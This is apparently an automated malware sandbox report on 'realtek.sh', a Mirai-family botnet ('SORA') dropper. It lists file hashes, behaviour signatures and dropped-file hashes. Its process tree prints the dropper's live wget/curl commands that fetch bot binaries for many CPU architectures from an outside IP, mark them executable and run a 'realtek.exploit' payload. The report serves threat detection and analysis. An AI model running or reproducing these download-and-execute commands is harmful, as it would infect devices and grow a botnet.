Analysis

  • max time kernel
    33s
  • max time network
    37s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    03-11-2024 14:37

General

  • Target

    realtek.sh

  • Size

    2KB

  • MD5

    5da53ff8a84b621ec81f2688731de0aa

  • SHA1

    30c63294b36c7ce652a32dfb74b6e590d53c3d3b

  • SHA256

    9ede79df1b2136ef9be538e21d3cf922527bd6010eeae9970a1eca134db18713

  • SHA512

    ed8dc1fa2ba6243c4d713fbf7f9d98ac4888ff685130718bf5cb559ed71c643a0630a8dff26558b0d4d1cae00fd02f9a632f337ca93a5dfadd8e522d8db8660f

Malware Config

Extracted

Family

mirai

Botnet

SORA

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 14 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 14 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 14 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 30 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 26 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/realtek.sh
    /tmp/realtek.sh
    1⤵
    • Writes file to tmp directory
    PID:657
    • /usr/bin/wget
      wget http://93.123.85.190/bins/sora.x86
      2⤵
      • Writes file to tmp directory
      PID:661
    • /usr/bin/curl
      curl -O http://93.123.85.190/bins/sora.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:672
    • /bin/cat
      cat sora.x86
      2⤵
        PID:681
      • /bin/chmod
        chmod +x realtek.sh robben sora.x86 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
        2⤵
        • File and Directory Permissions Modification
        PID:683
      • /tmp/robben
        ./robben realtek.exploit
        2⤵
        • Executes dropped EXE
        PID:684
      • /usr/bin/wget
        wget http://93.123.85.190/bins/sora.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:687
      • /usr/bin/curl
        curl -O http://93.123.85.190/bins/sora.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:690
      • /bin/cat
        cat sora.mips
        2⤵
        • System Network Configuration Discovery
        PID:695
      • /bin/chmod
        chmod +x realtek.sh robben sora.mips sora.x86 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
        2⤵
        • File and Directory Permissions Modification
        PID:696
      • /tmp/robben
        ./robben realtek.exploit
        2⤵
        • Executes dropped EXE
        PID:697
      • /usr/bin/wget
        wget http://93.123.85.190/bins/sora.x86_64
        2⤵
        • Writes file to tmp directory
        PID:699
      • /usr/bin/curl
        curl -O http://93.123.85.190/bins/sora.x86_64
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:701
      • /bin/cat
        cat sora.x86_64
        2⤵
          PID:702
        • /bin/chmod
          chmod +x realtek.sh robben sora.mips sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
          2⤵
          • File and Directory Permissions Modification
          PID:703
        • /tmp/robben
          ./robben realtek.exploit
          2⤵
          • Executes dropped EXE
          PID:704
        • /usr/bin/wget
          wget http://93.123.85.190/bins/sora.i468
          2⤵
            PID:706
          • /usr/bin/curl
            curl -O http://93.123.85.190/bins/sora.i468
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:707
          • /bin/cat
            cat sora.i468
            2⤵
              PID:712
            • /bin/chmod
              chmod +x realtek.sh robben sora.i468 sora.mips sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
              2⤵
              • File and Directory Permissions Modification
              PID:713
            • /tmp/robben
              ./robben realtek.exploit
              2⤵
              • Executes dropped EXE
              PID:715
            • /usr/bin/wget
              wget http://93.123.85.190/bins/sora.i686
              2⤵
              • Writes file to tmp directory
              PID:716
            • /usr/bin/curl
              curl -O http://93.123.85.190/bins/sora.i686
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:719
            • /bin/cat
              cat sora.i686
              2⤵
                PID:723
              • /bin/chmod
                chmod +x realtek.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
                2⤵
                • File and Directory Permissions Modification
                PID:724
              • /tmp/robben
                ./robben realtek.exploit
                2⤵
                • Executes dropped EXE
                PID:725
              • /usr/bin/wget
                wget http://93.123.85.190/bins/sora.mpsl
                2⤵
                • Writes file to tmp directory
                PID:728
              • /usr/bin/curl
                curl -O http://93.123.85.190/bins/sora.mpsl
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:731
              • /bin/cat
                cat sora.mpsl
                2⤵
                  PID:735
                • /bin/chmod
                  chmod +x realtek.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
                  2⤵
                  • File and Directory Permissions Modification
                  PID:736
                • /tmp/robben
                  ./robben realtek.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:737
                • /usr/bin/wget
                  wget http://93.123.85.190/bins/sora.arm4
                  2⤵
                    PID:740
                  • /usr/bin/curl
                    curl -O http://93.123.85.190/bins/sora.arm4
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:744
                  • /bin/cat
                    cat sora.arm4
                    2⤵
                      PID:749
                    • /bin/chmod
                      chmod +x realtek.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
                      2⤵
                      • File and Directory Permissions Modification
                      PID:750
                    • /tmp/robben
                      ./robben realtek.exploit
                      2⤵
                      • Executes dropped EXE
                      PID:752
                    • /usr/bin/wget
                      wget http://93.123.85.190/bins/sora.arm5
                      2⤵
                      • Writes file to tmp directory
                      PID:753
                    • /usr/bin/curl
                      curl -O http://93.123.85.190/bins/sora.arm5
                      2⤵
                      • Checks CPU configuration
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:757
                    • /bin/cat
                      cat sora.arm5
                      2⤵
                        PID:761
                      • /bin/chmod
                        chmod +x realtek.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
                        2⤵
                        • File and Directory Permissions Modification
                        PID:762
                      • /tmp/robben
                        ./robben realtek.exploit
                        2⤵
                        • Executes dropped EXE
                        PID:765
                      • /usr/bin/wget
                        wget http://93.123.85.190/bins/sora.arm6
                        2⤵
                        • Writes file to tmp directory
                        PID:767
                      • /usr/bin/curl
                        curl -O http://93.123.85.190/bins/sora.arm6
                        2⤵
                        • Checks CPU configuration
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:770
                      • /bin/cat
                        cat sora.arm6
                        2⤵
                          PID:776
                        • /bin/chmod
                          chmod +x realtek.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
                          2⤵
                          • File and Directory Permissions Modification
                          PID:777
                        • /tmp/robben
                          ./robben realtek.exploit
                          2⤵
                          • Executes dropped EXE
                          • Reads runtime system information
                          PID:779
                        • /usr/bin/wget
                          wget http://93.123.85.190/bins/sora.arm7
                          2⤵
                          • Writes file to tmp directory
                          PID:780
                        • /usr/bin/curl
                          curl -O http://93.123.85.190/bins/sora.arm7
                          2⤵
                          • Checks CPU configuration
                          • Reads runtime system information
                          • Writes file to tmp directory
                          PID:784
                        • /bin/cat
                          cat sora.arm7
                          2⤵
                            PID:787
                          • /bin/chmod
                            chmod +x realtek.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
                            2⤵
                            • File and Directory Permissions Modification
                            PID:788
                          • /tmp/robben
                            ./robben realtek.exploit
                            2⤵
                            • Executes dropped EXE
                            • Reads runtime system information
                            PID:789
                          • /usr/bin/wget
                            wget http://93.123.85.190/bins/sora.ppc
                            2⤵
                            • Writes file to tmp directory
                            PID:790
                          • /usr/bin/curl
                            curl -O http://93.123.85.190/bins/sora.ppc
                            2⤵
                            • Checks CPU configuration
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:791
                          • /bin/cat
                            cat sora.ppc
                            2⤵
                              PID:794
                            • /bin/chmod
                              chmod +x realtek.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
                              2⤵
                              • File and Directory Permissions Modification
                              PID:795
                            • /tmp/robben
                              ./robben realtek.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:796
                            • /usr/bin/wget
                              wget http://93.123.85.190/bins/sora.ppc440fp
                              2⤵
                                PID:799
                              • /usr/bin/curl
                                curl -O http://93.123.85.190/bins/sora.ppc440fp
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:802
                              • /bin/cat
                                cat sora.ppc440fp
                                2⤵
                                  PID:805
                                • /bin/chmod
                                  chmod +x realtek.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-AQcVVy
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:807
                                • /tmp/robben
                                  ./robben realtek.exploit
                                  2⤵
                                  • Executes dropped EXE
                                  PID:808
                                • /usr/bin/wget
                                  wget http://93.123.85.190/bins/sora.m68k
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:809
                                • /usr/bin/curl
                                  curl -O http://93.123.85.190/bins/sora.m68k
                                  2⤵
                                  • Checks CPU configuration
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:813
                                • /bin/cat
                                  cat sora.m68k
                                  2⤵
                                    PID:820
                                  • /bin/chmod
                                    chmod +x realtek.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:822
                                  • /tmp/robben
                                    ./robben realtek.exploit
                                    2⤵
                                    • Executes dropped EXE
                                    PID:823
                                  • /usr/bin/wget
                                    wget http://93.123.85.190/bins/sora.sh4
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:826
                                  • /usr/bin/curl
                                    curl -O http://93.123.85.190/bins/sora.sh4
                                    2⤵
                                    • Checks CPU configuration
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:830
                                  • /bin/cat
                                    cat sora.sh4
                                    2⤵
                                      PID:836
                                    • /bin/chmod
                                      chmod +x realtek.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_64
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:837
                                    • /tmp/robben
                                      ./robben realtek.exploit
                                      2⤵
                                      • Executes dropped EXE
                                      PID:839

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • /tmp/robben

                                    Filesize

                                    28KB

                                    MD5

                                    fa5457b7546c1b7060c30bde3f8649ca

                                    SHA1

                                    7c75f6463c36eaebc4719f47d8047e5195a85057

                                    SHA256

                                    d3f2f30efffec0f49e28199c60b2819a3e831ae0ba920abd2c5ece5e4bfb3adf

                                    SHA512

                                    f012d61a479015af70447b1c3bd2a48c2977691f9a180f4f5c3340b034c65d69782299cb8459e92e3a18dcadfa3078c8b1c613593170f9fa95dd53ba36050c21

                                  • /tmp/robben

                                    Filesize

                                    28KB

                                    MD5

                                    ec332610b0ca5b634c097ed14f42eedc

                                    SHA1

                                    abcbd111601f4165c400e9db36fbf20339e37170

                                    SHA256

                                    2bfdc588e26d5f6ac54ca3330ced3ab2bfc9bafb98cdd91fd017180dd5848b3a

                                    SHA512

                                    f41f54e2aca4a5dfa3d7bcbad45963aa943fa3b6536c34f7c92c7c79894f1009ef5ab13cfed39b74ffc614791b77497689bcbe71edfefecb20497d873c92d1b0

                                  • /tmp/robben

                                    Filesize

                                    212B

                                    MD5

                                    83ab6cd9a67528bbc6f4f360cb7f8d83

                                    SHA1

                                    07e8f17209e0569aab39f062568ff0090d9b20d4

                                    SHA256

                                    3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435

                                    SHA512

                                    171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f

                                  • /tmp/robben

                                    Filesize

                                    28KB

                                    MD5

                                    d356657b6ea7a715b60217a914eb6ca8

                                    SHA1

                                    b276b1a91895c3025e9f9d64227205dac79c8ef6

                                    SHA256

                                    b0758e5e7fde30404ec43dd5fba21253735464062e8a10f0876193d18194fe22

                                    SHA512

                                    3b0ab5d1282c9d2ea18ed0fc78aeabafde6c16fa094d53d39a67d3316482da0cffa444dd5dc14aeefb547ce2f789480caa5bb514cb4a26787c7441ba8862e262

                                  • /tmp/robben

                                    Filesize

                                    64KB

                                    MD5

                                    fb3d051f41bd7347aeff64980f2d100b

                                    SHA1

                                    5261ff91b8d99d6b8f5f647e33aad29b90cee973

                                    SHA256

                                    19f4b46d738fa23ff571db081cea0bf34509b9799de2116853e77691faaebec1

                                    SHA512

                                    82dd9805571030fc4a56a8d5838f5ee3fe1b162f059c905a48f37abcc4dc58442e1e909ab4a2352d690af8ac306eafe4d89cb87f37baec8a8136d48e884be4dd

                                  • /tmp/sora.x86

                                    Filesize

                                    27KB

                                    MD5

                                    00eff503439515d9b12b9c068367cb80

                                    SHA1

                                    82d68f2b1ffca8558458c1b858599542a67d8bbf

                                    SHA256

                                    2962b987b00b166299f9a73f7ccb8dc02b4208266465b41f6b1c9c28277d7276

                                    SHA512

                                    3800bc5a8f3983fc50813c49c906203af6528ff3eb97b4818a8632085562c25eab1c691edb5dcdc96c8d2c3f25784a41897ec8a52c042d391899a310224d50f5

                                  • memory/690-1-0xb676f000-0xb6780044-memory.dmp

                                  • memory/731-2-0xb66c9000-0xb66da044-memory.dmp

                                  • memory/765-3-0x00008000-0x0001e9e8-memory.dmp

                                  • memory/779-4-0x00008000-0x0002db18-memory.dmp

                                  • memory/789-5-0x00008000-0x00029794-memory.dmp